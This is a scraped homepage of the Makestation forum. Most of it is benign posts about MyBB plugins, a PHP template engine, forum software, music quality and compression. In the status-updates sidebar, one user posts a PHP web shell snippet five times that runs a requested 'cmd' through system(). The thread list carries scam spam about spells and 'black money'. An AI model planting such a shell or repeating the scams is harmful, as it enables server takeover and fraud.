Welcome, Guest
Welcome to Makestation! We are a creative arts/indie discussion community — Your center for creative arts discussion, unleashed!

Please note that you must log in to participate in discussions on the forum. If you do not have an account, you can create one here. We hope you enjoy the forum!

Status Updates
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
View all updates

Search Forums

(Advanced Search)

Forum Statistics
» Members: 1,241
» Latest member: monikadickey75
» Forum threads: 74,677
» Forum posts: 99,111

Full Statistics

Online Users
There are currently 1253 online users.
» 0 Member(s) | 1252 Guest(s)
Google

Latest Threads
#Win court appeal spells+...
Forum: Software
Last Post: mapesa
34 minutes ago
» Replies: 0
» Views: 3
black money real,black mo...
Forum: Software
Last Post: mapesa
37 minutes ago
» Replies: 0
» Views: 2
SSD Chemical Solution Che...
Forum: Software
Last Post: mapesa
38 minutes ago
» Replies: 0
» Views: 3
win child custody court c...
Forum: Software
Last Post: mapesa
39 minutes ago
» Replies: 0
» Views: 2
join illuminati club USA+...
Forum: Software
Last Post: mapesa
40 minutes ago
» Replies: 0
» Views: 3
#Win Court Case Spells ca...
Forum: The Others
Last Post: mapesa
42 minutes ago
» Replies: 0
» Views: 1
답십리마사지【오피사이트.NET】답십리마사지 답...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
43 minutes ago
» Replies: 0
» Views: 6

 
  Where are forums going in the 20s?
Posted by: Darth-Apple - October 21st, 2020 at 1:42 AM - Forum: MyBB Related - Replies (3)

I'm just going to call this decade the 20s. I think this year kicked it off. We've been through enough. Here we go. Finna 

Anyway, I've noticed a lot has changed. Most free softwares have sort of fallen by the wayside. Those that are still running free forums are running simpler (not more advanced) communities, almost with fewer features. 

MyBB's support forum is only a shadow of its old self. It's still alive and has a dedicated following, and a number of developers still contribute plugins and themes. But the software itself lacks responsiveness and basic features that come with more modern softwares, so it's been difficult for them to attract the new users they deserve. I absolutely love MyBB, so it's a bit of a shame that it seems slower. It seems that it doesn't have the fire it once did though, and I hope that this can change in the long term. 

Forums have really been taken over by more modernized solutions, such as Facebook groups. FB groups is huge. I actually thought long and hard about making a presence for MS on FB groups, but my fear is that it would detract from the actual forum itself. We will probably expand long-term into more modernized solutions, but the makestation.net forum is the absolute first priority, and we won't do anything to the detriment of this forum. 

That being said, it truly seems that the landscape has changed. The opportunities that were available to us when MS was founded in 2013 just don't seem to be as plentiful now. 

What are your thoughts? Where are forums going in this next decade?

Print this item

  Simple Reputation Bars [MyBB Plugin]
Posted by: Darth-Apple - October 20th, 2020 at 6:48 AM - Forum: MyBB Related - Replies (7)

Someone on the MyBB community forum requested a reputation bars plugin tonight. I was surprised to find out that no such plugin existed yet for MyBB 1.8. Some previous ones existed for older MyBB versions, but they had restricted licenses prohibiting people like me from porting them. 

Long story short, I ended up writing a new one. It's extremely simple at this time, but I figured I'd post here, in case anyone needs a reputation bars plugin and lands here from google. Smile

[Image: j7K3e.png]

[Image: NMJQH.png]

Download: https://github.com/Darth-Apple/Simple-My...ation-Bars

Print this item

  Simple PhpBB theme (getting my feet wet)
Posted by: Darth-Apple - October 16th, 2020 at 1:52 AM - Forum: Web Design & Internet - Replies (3)

Hello all, 

I was looking at the phpBB default design the other day and had an idea pop into my head with the theme. Long story short, I found myself messing around with it to get a feel for what could be done with it... and lo and behold, a theme comes forth. Finna 

I will say that so far it's been VERY different from what I'm used to. I've never messed with phpBB before, so this is a first. That said, it's absolutely awesome working with a tableless, responsive default theme by default, so it's been a huge timesaver. It's gotten a little easier as I've messed with it some more. 

What do you guys think of this so far? (I'm thinking about releasing this if it turns out well) Smile

   

   

   

Print this item

  Simple PHP Template Engine
Posted by: Darth-Apple - October 15th, 2020 at 10:03 PM - Forum: Web Design & Internet - Replies (7)

Hello all, 

EDIT: See the GitHub version. A new version is available with significant improvements. https://github.com/Darth-Apple/simple-php-templates

I've done quite a few small CMS-style projects for university and for random purposes. Each time, we ended up having to theme the project and it was always easier to do so by separating the HTML from the PHP. Fortunately, there are many template engines available, but some are very tedious to implement and are not suitable for small projects. 

Luckily, it's incredibly easy to do templates with no trouble whatsoever. This template engine is incredibly simple and can be added to your project in less than 5 minutes. I use it on every raw project I've ever done, and it's a great time-saver and makes our code much cleaner and easier to maintain. 

I've included the template_engine.php file with this post. It's licenced under the GPL 2, but if you need a different license, please PM me! 



1. Create a file called template_engine.php with the downloaded file attached here. Include (or require_once) this file into every file/page of your project (such as index.php, etc). You may want to use your require_once("template_engine.php") in your init or global.php instead, depending on how your project is structured.

2. Now, create a templates folder inside your project. This folder should be in your project root and will contain all HTML template files. 

3. Instantiate the template engine in each of these pages, or in your init file. Use the following: 

Code:
$templates = new template_engine(); 


4. Start setting template variables/tags in your code. These variables will be replaced with the values they are set to when the template engine outputs your page. For example, in your index.php, you could set variables like this: 

Code:
$templates->set("some_variable", "1234");
$templates->set("username", "Steve"); 

Now, the [@some_variable] tag will be replaced by "1234" by the template engine when it's ready to parse. Likewise, [@username] will be replaced with "Steve". Create as many variables as you like.

5. Create your index.html template in your templates folder. Use something like the following:

Code:
<head> 
<title>My Index Page </title>
</head>

<body>
<h1> Hello, [@username]. Today's magic variable: [@some_variable] </h1> 
</body>

As you can see, we've used our new template variables directly in the template file. These variables will be replaced by their corresponding values on the fly by the template engine.

6. Parse the template and echo it. This will process all template tags and will send the resulting page to the browser. 

Code:
echo $template->parse("index"); 

And now, with a simple template engine and 5 minutes of implementation, you can abstract away all HTML from your PHP code. This allows you to completely refactor the style and hTML structure of your theme/page without changing any of your PHP files, and keeps the project much cleaner than it would be with interleaved HTML/PHP. 

Simple template engines such as these are perfect for small projects, university/college assignments, etc.

Hope this helps! Feel free to use it in your own projects as needed. Smile

More Information (click spoiler):
[spoiler]

Can I change a variable/tag after it's already been set?
Yes! So long as you haven't parsed your template (sent it to the browser) yet, you can use the $templates->set function as many times as you need. It will overwrite the previous value of the tag with your new value.

How should I handle template headers/footers?

I recommend having a separate header.html and footer.html template. At the very beginning of your PHP page, parse these using the following:
Code:
$header = $templates->parse("header");
$templates->set("header", $header);

$footer = $templates->parse("footer");
$templates->set("footer", $footer);

Now, in your index.html template, you may use the header/footer tags as normal:

Code:
[@header]

<h1> My page content </h1>
[@footer]

This allows you to use the same header/footer template for all of your pages, preventing you from having to duplicate the HTML in every page of your website.

Can I use templates inside of templates?

Yes! In fact this is recommend and is standard practice for simple template engines such as these. See the example above on how to do this.

What about the license?
Feel free to use this in your own projects, that's what it's for! I wouldn't have licensed this at all, but I don't want someone stealing it, saying they wrote it, and then licensing it under some restrictive license. Finna If you need a different license, please PM me!
[/spoiler]



Attached Files
.php   template_engine.php (Size: 2.58 KB / Downloads: 308)
Print this item

  Anyone ever use FluxBB?
Posted by: Darth-Apple - October 14th, 2020 at 4:02 PM - Forum: Web Design & Internet - Replies (6)

FluxBB is an extremely bare-bones, simplified forum software that takes away almost all bloat that could be conceived. It's so simple that the entire ModCP and ACP are combined into one page, but yet it works and it's easy, and it's quite refreshing really. Much less cluttered, which is nice. 

 I installed it to experiment today (was always fond of PunBB, Flux's upstream parent). It doesn't have many features, but the interface is extremely simple and clean and the ACP is extremely easy to use. It has a huge mod database for such a bare-bones software as well. Some of them look pretty interesting. 


I would never use it personally. It's a little too simple for my tastes(which is the whole point of it really), but it's perhaps the most streamlined mainstream forum software on the internet. For forums that need simplicity, it's nice. And judging by the mods, it apparently is pretty popular. 

That being said, the default theme is absolutely horrendous, but some people have come up with some nice ones.



Attached Files Thumbnail(s)
   
Print this item

  Euthanized a Pet
Posted by: Darth-Apple - October 13th, 2020 at 9:13 PM - Forum: Lifestyle - Replies (8)

Didn't think it would be this hard, but it was absolutely the right thing to do. He will be missed like no other. Poor cat was crying like a baby. Never heard a cat cry like that, but I found out what it was like on Sunday, and it wasn't a pretty sight. 

We made the call to end his suffering the easiest way possible. He was obviously dying and in excrutiating pain (despite pain relievers and sedatives), so we decided this was the best thing we could do for him. The vet was shocked he was still alive when we arrived. FIP had been diagnosed too late for us to treat it. (By the way, if anyone knows someone whose pet is fighting FIP, have them contact me. I know of treatments that can cure it if it's caught early). 

Seems cliche because we all lose pets we love, but this one was harder than usual. Poor thing was much too young to die, and he had a force of will to be reckoned with. He refused to let go, even in his final hours. 

I figured I'd move on like usual, I've lost friends and family and it's been so much easier. But this particular time it hit me hard. I'm glad the vet let us be near him in his final hours (Covid restrictions usually restrict that), but it doesn't make it any more bearable.

Print this item

  Member of the Month VOTE - October 2020
Posted by: Guardian - October 2nd, 2020 at 8:21 PM - Forum: Community Related - Replies (2)

Please make your selection or the Member of the Month for October 2020.

This vote is to recognize members for their contributions for the previous month. In this case, a user's contributions for the month of September lead to their nomination for the October Member of the Month.

The poll is anonymous, and no one will see your vote.

Member of the Month candidates:

@brian51 
@pierreh

Print this item

  Amazon HD Music
Posted by: Darth-Apple - October 2nd, 2020 at 2:50 AM - Forum: Media & Entertainment - Replies (1)

I tried Amazon Ultra HD Music today. I was quite pleasantly impressed. There was a HUGE difference in quality over normal services. 

Granted, I'm somewhat of an audiophile. I have a fairly precise ear and can hear artifacts in most compression formats, but Spotify's 320kbps premium is one of the few lossy compression algorithms that is totally transparent to my ears. It sounds exactly like the CDs in every single perceptable way. (Ogg at 192kbps is very close as well). 

So when I compared Spotify and Amazon Ultra HD side by side, I was shocked when I heard FAR better than CD quality audio. It was a landslide difference. It was so noticeable that it was like being colorblind your whole life and learning to see.

Truthfully, I wonder if it was actually the mastering job and not necessarily just the format. Because suddenly I could hear where instruments were coming from spatially so much better than just sounding muffled between my ears. I could hear extremely faint sounds clearly (rather than being muffled or blending in with other parts of the mix). Even on live recordings, very quiet clapping from even a single audience member or very slight nuances that I couldn't hear were now audible. And the keyboards and guitars sounded so much more clear.

I can't explain it. The human range of hearing tops out at 20 khz, and CDs (with a sample rate of 44.1khz) can reproduce 22.05 khz accurately (above the human range of hearing). Furthermore, CDs use 16 bit audio which is well known to be more than enough to have plenty of dynamic range. Going from 16 to 24 bits only allows already imperceptable noise to become even quieter. Usually the differences are imperceptable. 

But somehow, when you take 96khz 24 bit audio and put them together on U-HD, everything sounds so much more spacious. It sounds less muffled, more nuanced, more detailed, and more alive. And scientifically that should be impossible, but it absolutely did sound noticeably better. 

Perhaps it really was the mastering (production) and not necessarily the format itself. I honestly dont' know, but in any case, if you have decent headphones, I'd recommend trying it. You won't regret it.

Print this item

  [Beta] MyBB Theme Patcher
Posted by: Darth-Apple - September 29th, 2020 at 10:50 PM - Forum: MyBB Related - Replies (6)

Hello all, 

I threw together a quick plugin last night to resolve a number of issues with "Authorization Mismatch Error" codes (or user login issues) on older MyBB themes. This is single-handedly one of the most popular problems MyBB users have when installing older themes, and previously, the only fix was to manually edit templates. This plugin will take care of these fixes automatically and should save administrators some time when installing older themes! Smile

To run the patches, simply upload the plugin, activate, and you're done. The readme has information on how to patch additional themes after the patcher has been run initially. 

IMPORTANT: This is a best-faith effort to patch as many old themes as possible. It cannot be guaranteed to work on every single theme. Please make a database backup before use! This is pre-release and is currently in testing, full release is coming soon. Smile



Attached Files
.zip   MyBB Theme Patcher.zip (Size: 18.61 KB / Downloads: 320)
.zip   MyBB Theme Patcher (Stable Version).zip (Size: 23.08 KB / Downloads: 305)
Print this item

  ZPAQ - Insane File Compression
Posted by: Darth-Apple - September 27th, 2020 at 4:04 PM - Forum: Software - Replies (2)

I have around ~70GB of old music projects (Logic Pro X) sitting on my hard drive. Every single track is a 48khz/24 bit wav/aiff, meaning that some tracks are over 50% bigger than normal CD-Quality WAV files. These projects easily reach several gigabytes, especially as they near completion, and WAV files are very difficult to compress with traditional compression algorithms. I am in the process of saving them externally to free up space, so I began my search.

Surprisingly, 7-zip did a pretty good job of shrinking the projects by 20-30%, but that didn't do a lot of good for situations when I had a lot of duplicate files (bounces and alternative versions) that added bloat. LZMA can detect duplicate files, but it can only do so if they are very close to each other (within 16-64MB of each other, depending on the dictionary size/configuation). 

I found a tool called ZPAQ for that. It's a command-line only tool and it's a bit obscure, but it relies on implementing several compression algorithms and determining which algorithm is best for each specific type of file. This allows it to do much better on raw audio files that are generally difficult to compress with standard zip/7z-style compression. 

The results: On about 9.5GB of data, I shrunk it down to a mere 1.3GB. This was a whopping reduction. (7-zip got it down to about 5.95 GB, for comparison). On files without duplicates, ZPAQ generally saw about a 35% reduction, and a 30% reduction on standard 7z/LZMA (compared to 10-20% on standard ZIP). The differences were far less extreme, but still very impressive considering the difficult-to-compress nature of lossless audio.

That being said, I will likely continue to use the 7z format because it's far better supported and doesn't require command-line interfaces to extract/compress (storage is cheap anyway Finna). However, with such extreme reductions seen by ZPAQ, I may look into it a little more for the future.

Print this item


Dark/Light Theme Selector

Contact Us | Makestation | Return to Top | Lite (Archive) Mode | RSS Syndication 
Proudly powered by MyBB 1.8, © 2002-2025
Forum design by Makestation Team © 2013-2025